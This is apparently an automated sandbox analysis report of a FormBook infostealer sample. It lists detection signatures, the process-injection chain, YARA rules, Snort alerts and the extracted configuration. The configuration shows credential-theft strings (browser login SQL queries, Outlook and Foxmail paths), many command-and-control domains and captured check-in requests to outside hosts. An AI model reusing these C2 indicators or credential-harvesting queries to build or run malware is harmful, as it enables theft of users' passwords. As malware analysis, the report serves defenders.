Loading ...

Play interactive tourEdit tour

Analysis Report JdtN8nIcLi8RQOi.exe

Overview

General Information

Sample Name:JdtN8nIcLi8RQOi.exe
Analysis ID:339360
MD5:aee550440966b0bd34d9ccb2b1f7f146
SHA1:14125d61fbcf4b63cb9c9ad82a60be3ad9aa2a3d
SHA256:d31340f14a66b43a1f5cf461cf48278bb97bfc33ef5a8bd0b29d0a3e6f315895
Tags:exeFormbookOutlook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • JdtN8nIcLi8RQOi.exe (PID: 6596 cmdline: 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe' MD5: AEE550440966B0BD34D9CCB2B1F7F146)
    • JdtN8nIcLi8RQOi.exe (PID: 5756 cmdline: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe MD5: AEE550440966B0BD34D9CCB2B1F7F146)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 4832 cmdline: /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79dc", "KEY1_OFFSET 0x1bb1e", "CONFIG SIZE : 0xb5", "CONFIG OFFSET 0x1bc1e", "URL SIZE : 22", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc41a2362", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd013cd", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "philippebrooksdesign.com", "cmoorestudio.com", "profille-sarina23tammara.club", "dqulxe.com", "uiffinger.com", "nolarapper.com", "maconanimalexterminator.com", "bisovka.com", "loveisloveent.com", "datication.com", "spxo66.com", "drhelpnow.com", "ladybug-cle.com", "macocome.com", "thepoppysocks.com", "eldritchparadox.com", "mercadolibre.company", "ismartfarm.com", "kansascarlot.com", "kevinld.com", "p87mbu2ss.xyz", "the-makery.info", "untegoro.site", "newyorkcityhemorrhoidcenter.com", "crystalclearwholistics.com", "iregentos.info", "fullskis.com", "promanconsortium.com", "800029120.com", "mummyisme.com", "humpychocks.com", "myfavestuff.store", "naturalfemina.com", "bimetalthermostatksd.com", "draysehaniminciftligi.com", "sf9820.com", "4thop.com", "24les.com", "thepupcrew.com", "strangephobias.com", "hotmamabody.com", "restaurantsilhouette.com", "texasadultdayservices.com", "binahaiat.com", "nipseythegreat.com", "pelisplusxd.net", "mamborio.com", "elitedigitalperformance.com", "therileyretreat.com", "aieqbgk.icu", "corkboardit.net", "katieberiont.com", "telemedicinehamilton.com", "imagistor.com", "tekdesignltd.com", "bmw-7979.com", "animaliaartist.com", "straightlineautoserviceerie.net", "qoo10online.com", "tesseracoffee.com", "central-car-sales.com", "thecleaningenthusiast.com", "musicmercch.com", "pearlpham.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.allismd.com/ur06/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166a9:$sqlite3step: 68 34 1C 7B E1
      • 0x167bc:$sqlite3step: 68 34 1C 7B E1
      • 0x166d8:$sqlite3text: 68 38 2A 90 C5
      • 0x167fd:$sqlite3text: 68 38 2A 90 C5
      • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
      00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x158a9:$sqlite3step: 68 34 1C 7B E1
          • 0x159bc:$sqlite3step: 68 34 1C 7B E1
          • 0x158d8:$sqlite3text: 68 38 2A 90 C5
          • 0x159fd:$sqlite3text: 68 38 2A 90 C5
          • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
          1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79dc", "KEY1_OFFSET 0x1bb1e", "CONFIG SIZE : 0xb5", "CONFIG OFFSET 0x1bc1e", "URL SIZE : 22", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc41a2362", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd013cd", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
            Multi AV Scanner detection for submitted fileShow sources
            Source: JdtN8nIcLi8RQOi.exeReversingLabs: Detection: 21%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: JdtN8nIcLi8RQOi.exeJoe Sandbox ML: detected
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: WWAHost.pdb source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: WWAHost.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.715992028.000000000122F000.00000040.00000001.sdmp, WWAHost.exe, 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: JdtN8nIcLi8RQOi.exe, WWAHost.exe
            Source: Binary string: mscorrc.pdb source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.maconanimalexterminator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 HTTP/1.1Host: www.pelisplusxd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.allismd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.central-car-sales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO HTTP/1.1Host: www.nolarapper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe HTTP/1.1Host: www.promanconsortium.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf HTTP/1.1Host: www.profille-sarina23tammara.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.restaurantsilhouette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 192.185.0.218 192.185.0.218
            Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
